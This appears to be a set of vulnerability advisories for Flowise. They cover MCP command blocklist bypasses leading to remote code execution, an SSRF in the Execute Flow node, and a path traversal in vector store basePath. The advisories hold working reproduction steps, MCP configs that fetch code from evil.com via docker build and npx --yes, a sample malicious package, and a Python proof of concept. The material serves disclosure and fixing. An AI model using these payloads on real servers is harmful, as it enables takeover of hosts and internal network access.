Package Instance

Flowise has an MCP Security Bypass that Enables RCE
## Summary
There are three bypass methods for the security limitations of the Flowise MCP feature, and attackers can execute arbitrary commands by combining these three methods

## Details


### 【Vulnerability  one】The Docker build subcommand not being on the blocklist leads to remote code execution 

The attacker configures the interface through the MCP tool to provide {"command":"docker","args":["build","https://evil.com/"]} as the Custom MCP Server configuration 
→ Bypass the validateCommandFlags docker blocklist (only blocks run/exec/-v/--volume, etc., but does not block build)
→ docker build <remote-URL> will pull the Dockerfile from the remote address and execute the RUN instructions within it
→ Allows attackers to escape from Docker through methods such as mounting, thereby gaining full control of the Flowise host machine 

Precondition: 
1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows
2. The deployment environment has the docker command

Vulnerable function - validateCommandFlags: 

```
file: packages/components/nodes/tools/MCP/core.ts:260-310

const COMMAND_FLAG_BLACKLIST: Record<string, string[]> = {
    docker: [
        'run', 'exec', '-v', '--volume', '--privileged', '--cap-add',
        '--security-opt', '--network', '--pid', '--ipc'
        //  'build', 'pull', 'push', 'cp', 'commit' are not on the blocklist 
    ],
    npx: ['-c', '--call', '--shell-auto-fallback', '-y'],
    npm: ['run', 'exec', 'install', '--prefix', '-g', '--global', 'publish', 'adduser', 'login'],
    // ...
}
export function validateCommandFlags(command: string, args: string[]): ValidationResult {
    const blacklist = COMMAND_FLAG_BLACKLIST[command] || []
    for (const arg of args) {
        if (blacklist.includes(arg)) {
            return { valid: false, error: `Argument '${arg}' is not allowed for command '${command}'` }
        }
    }
    return { valid: true }
}
```

Reproduction process:

Add MCP config via UI or API interface, for example: 

<img width="1280" height="414" alt="2f0b6dfad5458616781921e1c28339d0" src="https://github.com/user-attachments/assets/6c8419c5-6261-46bb-8a30-3ac1ec3fb599" />

Then execute: 

```
POST /api/v1/prediction/{chatflows_id} HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Authorization: Bearer apikey
Content-Length: 17

{"question": "1"}
```

After execution, the command can be triggered to execute docker build http://evil.com 

<img width="1280" height="319" alt="f98e1d91428be6077ac6cf0472285f17" src="https://github.com/user-attachments/assets/856d46b4-7949-4091-bed9-a7c3fecc62f0" />

If a privileged container is deployed, then it can fully control the Flowise host machine 

### 【Vulnerability  two】 npx --yes long parameter alias bypassing blocklist leads to remote code execution

The attacker configures the MCP tool to provide {"command":"npx","args":["--yes","malicious-package"]} 
→ validateCommandFlags npx blocklist only contains short parameter -y, and does not block long parameter alias --yes
→ npx --yes malicious-package automatically agrees to install and execute any npm package
→ Leads to remote code execution (RCE) on the server 

Precondition: 
1. Have a Flowise account (any role, including regular users) or an API with view&update permissions for chatflows
2. The deployment environment has the npx command

npx blocklist:

```
file: packages/components/nodes/tools/MCP/core.ts:270-280

npx: ['-c', '--call', '--shell-auto-fallback', '-y'],
//    Only the short parameter -y is present, without the long parameter alias --yes
```

Reproduction process:
Add MCP config via UI or API interface, for example: 

<img width="1910" height="690" alt="85ea14ea224df9ed501827dfa47afb09" src="https://github.com/user-attachments/assets/8f3a2299-5460-4d23-b113-79ba4a9e52b6" />

```
{
  "command": "npx",
  "args":["--yes", "http://evil.com/FileName.tar"]
}
```

Contents of the tar file:

```
// index.js
#!/usr/bin/env node
const http = require('http');
const { execSync } = require('child_process');

const result = execSync('id && hostname').toString().trim();
console.error('[MCP-RCE-002] npx --yes bypass: ' + result);

// package.json
{
  "name": "attacker-mcp-pkg",
  "version": "1.0.0",
  "bin": {
    "attacker-mcp-pkg": "./index.js"
  },
  "scripts": {
    "postinstall": ""
  }
}
```
Then execute: 

```
POST /api/v1/prediction/{chatflows_id} HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Authorization: Bearer apikey
Content-Length: 17

{"question": "1"}
```

can trigger the vulnerability, execute the attacker's commands, and achieve RCE:

<img width="3026" height="256" alt="4c466067deb4606a38e4b73806661328" src="https://github.com/user-attachments/assets/e9821e3f-bda4-4c6a-bcd1-0b19053045c9" />

### node command bypassing local file restrictions leads to remote code execution

When configuring the CustomMCP node, the attacker provides {"command":"node","args":["local file"]} 
→ Bypass the security restrictions of validateArgsForLocalFileAccess 
→ Node process loads local files and executes arbitrary code → RCE 

Precondition: 
Have a Flowise account 

Analysis of Vulnerable Code:

```
// packages/components/nodes/tools/MCP/core.ts:177-220

export const validateArgsForLocalFileAccess = (args: string[]): void => {
    const dangerousPatterns = [
        // Absolute paths
        /^\/[^/]/, // Unix absolute paths starting with /
        /^[a-zA-Z]:\\/, // Windows absolute paths like C:\

        // Relative paths that could escape current directory
        /\.\.\//, // Parent directory traversal with ../
        /\.\.\\/, // Parent directory traversal with ..\
        /^\.\./, // Starting with ..

        // Local file access patterns
        /^\.\//, // Current directory with ./
        /^~\//, // Home directory with ~/
        /^file:\/\//, // File protocol

        // Common file extensions that shouldn't be accessed
        /\.(exe|bat|cmd|sh|ps1|vbs|scr|com|pif|dll|sys)$/i,

        // File flags and options that could access local files
        /^--?(?:file|input|output|config|load|save|import|export|read|write)=/i,
        /^--?(?:file|input|output|config|load|save|import|export|read|write)$/i
    ]
```

The above are the main restrictions imposed by the validateArgsForLocalFileAccess function, and it can be found that the regular expression "/^\/[^/]/" has a matching issue 

As the comment says, this regular expression essentially detects whether it is a Unix absolute path, which matches /etc/passwd but does not match //etc/passwd (the second character is '/') 

<img width="1280" height="570" alt="ea354264cbb2ace6a3a6a16e00f1d298" src="https://github.com/user-attachments/assets/9ca88790-77ea-4d42-8910-09e4453f981a" />

Therefore, the limitation of this function can be bypassed by starting with //

** Reproduction process: **

Create a new chatflow as follows:

<img width="1280" height="716" alt="7e884613b5897509b39467f8f3b7aae1" src="https://github.com/user-attachments/assets/478c7a89-4e77-4a5d-b063-de16cb640f92" />

After saving, cmd.js will be uploaded to the ~/.flowise/storage/{orgId}/{chatflow_id}/ directory

orgId can be obtained during login, and chatflow_id will also be returned when saving chatflow:

<img width="1280" height="702" alt="48b5ab8412babba312f502be5db1dad3" src="https://github.com/user-attachments/assets/090292cf-6361-43cd-91d7-eec6e578255b" />

For example: 
```
~/.flowise/storage/d2312f99-9043-413a-a1d2-3b7685a132b2/f8cc7f34-a1e5-4180-940a-47306d32adc2/cmd.js
```

Since paths like ~/ are restricted, and an absolute path needs to be obtained, use the following method:

<img width="1280" height="716" alt="990e1c81ed3957c5ae823e55efec15a5" src="https://github.com/user-attachments/assets/02c2a949-559a-4ee4-9675-c50a203d1e99" />

```
POST /api/v1/export-import/import  HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
x-request-from: internal
Cookie: cookie
Connection: keep-alive
Content-Length: 479

 {
    "ChatMessage": [
      {
        "id": "11111111-2222-4333-8444-555555555555",
        "role": "userMessage",
        "chatflowid": "{chatflow_id}",
        "content": "seed for home path test",
        "chatType": "EXTERNAL",
        "chatId": "audit-home-001",
        "createdDate": "2026-03-04T06:40:00.000Z",
        "fileUploads": "[{\"type\":\"stored-file\",\"name\":\"poc.txt\",\"mime\":\"text/plain\"}]"
      }
    ]
  }
```


<img width="1280" height="748" alt="d7f947940f4e6b6e95a61bcc301c25c0" src="https://github.com/user-attachments/assets/482fb78c-dbc8-4a0d-a042-4c993e976f10" />

```
POST /api/v1/export-import/chatflow-messages HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
x-request-from: internal
Cookie: cookie
Connection: keep-alive
Content-Length: 57

{"chatflowId":"{chatflow_id}"}

```

After obtaining the absolute path, simply modify the path in args to the path of the file name: 

```
  {
    "command": "node",
    "args": ["//root/.flowise/storage/d2312f99-9043-413a-a1d2-3b7685a132b2/f8cc7f34-a1e5-4180-940a-47306d32adc2/cmd.js"]
  }
```

After saving, execution will trigger RCE 


```
POST /api/v1/prediction/{chatflows_id} HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Authorization: Bearer apikey
Content-Length: 17

{"question": "1"}
```

## Impact

This vulnerability allows attackers to execute arbitrary commands on the Flowise server .

Flowise Execute Flow function has an SSRF vulnerability
### Summary

The attacker provides an intranet address through the base url field configured in the Execute Flow node 
→ Bypass checkDenyList / resolveAndValidate in httpSecurity.ts (not called)
→ Causes the server to initiate an HTTP request to any internal network address, read cloud metadata, or detect internal network services 

### Details

<img width="1280" height="860" alt="9a52a74e6fe2fd78e4962d1d68057fc2" src="https://github.com/user-attachments/assets/20df0006-9129-4886-8928-16d19a617c23" />

Then initiate the call: 

```
POST /api/v1/prediction/d6739838-d3b3-43d9-86ff-911a3d757a7e HTTP/1.1
Host: 127.0.0.1:3000
Content-Type: application/json
Authorization: Bearer apikey
Content-Length: 17

{"question": "1"}
```

Server received a request:

<img width="1432" height="172" alt="f45c757fec408e13739db068252ff21b" src="https://github.com/user-attachments/assets/d3dfe0f5-83ec-4c79-ab32-754382a68d5f" />

And there is an echo: 

<img width="1280" height="666" alt="fa0caf0deb306cfeeea8fdf8941a287e" src="https://github.com/user-attachments/assets/55a94d25-120b-4e9c-9517-46c2fc2b667f" />

Fix:
Call secureFetch for verification



### Impact

This is a Server-Side Request Forgery (SSRF) vulnerability that may lead to the following risks: 
- Explore Internal Web Applications
- Access sensitive management interfaces
- Leak internal configuration, credentials, or confidential information

This vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in enterprise environments.

Flowise: Path Traversal in Vector Store basePath
## Summary

The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.

## Vulnerability Details

| Field | Value |
|-------|-------|
| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |
| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |

## Prerequisites

1. **Authentication**: Valid API token with `documentStores:upsert-config` permission
2. **Document Store**: An existing Document Store with at least one processed chunk
3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)

## Root Cause

### Faiss (`Faiss.ts`)

```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    // ...
    const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
    await vectorStore.save(basePath)  // Direct filesystem write, no validation
}
```

### SimpleStore (`SimpleStore.ts`)

```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    
    let filePath = ''
    if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
    else filePath = basePath  // Used directly without sanitization
    
    const storageContext = await storageContextFromDefaults({ persistDir: filePath })  // Writes to arbitrary path
}
```

## Impact

An authenticated attacker can:

1. **Write files to arbitrary locations** on the server filesystem
2. **Overwrite existing files** if the process has write permissions
3. **Potential for code execution** by writing to web-accessible directories or startup scripts
4. **Data exfiltration** by writing to network-mounted filesystems

## Proof of Concept

### poc.py

```python
#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)

Usage:
  python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>
"""

import argparse
import json
import urllib.request
import urllib.error

def post_json(url, data, headers):
    req = urllib.request.Request(
        url,
        data=json.dumps(data).encode("utf-8"),
        headers={**headers, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=120) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")

def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True)
    ap.add_argument("--token", required=True)
    ap.add_argument("--store-id", required=True)
    ap.add_argument("--credential", required=True)
    ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc")
    args = ap.parse_args()

    payload = {
        "storeId": args.store_id,
        "vectorStoreName": "faiss",
        "vectorStoreConfig": {"basePath": args.base_path},
        "embeddingName": "openAIEmbeddings",
        "embeddingConfig": {"credential": args.credential},
    }

    url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
    headers = {"Authorization": f"Bearer {args.token}"}

    try:
        status, body = post_json(url, payload, headers)
        print(body)
    except urllib.error.HTTPError as e:
        print(e.read().decode())

if __name__ == "__main__":
    main()
```

### Setup

1. Create a Document Store in Flowise UI
2. Add a Document Loader (e.g., Plain Text) with any content
3. Click "Process" to create chunks
4. Note the Store ID from the URL
5. Get your embedding credential ID from Settings → Credentials

### Exploitation

```bash
# Write to /tmp
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path /tmp/flowise-pwned

# Path traversal variant
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path "../../../../tmp/traversal-test"
```

### Evidence

```
$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned

{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}

$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x  4 user  wheel   128 Jan 17 12:00 .
drwxrwxrwt 12 root  wheel   384 Jan 17 12:00 ..
-rw-r--r--  1 user  wheel  1234 Jan 17 12:00 docstore.json
-rw-r--r--  1 user  wheel  5678 Jan 17 12:00 faiss.index
```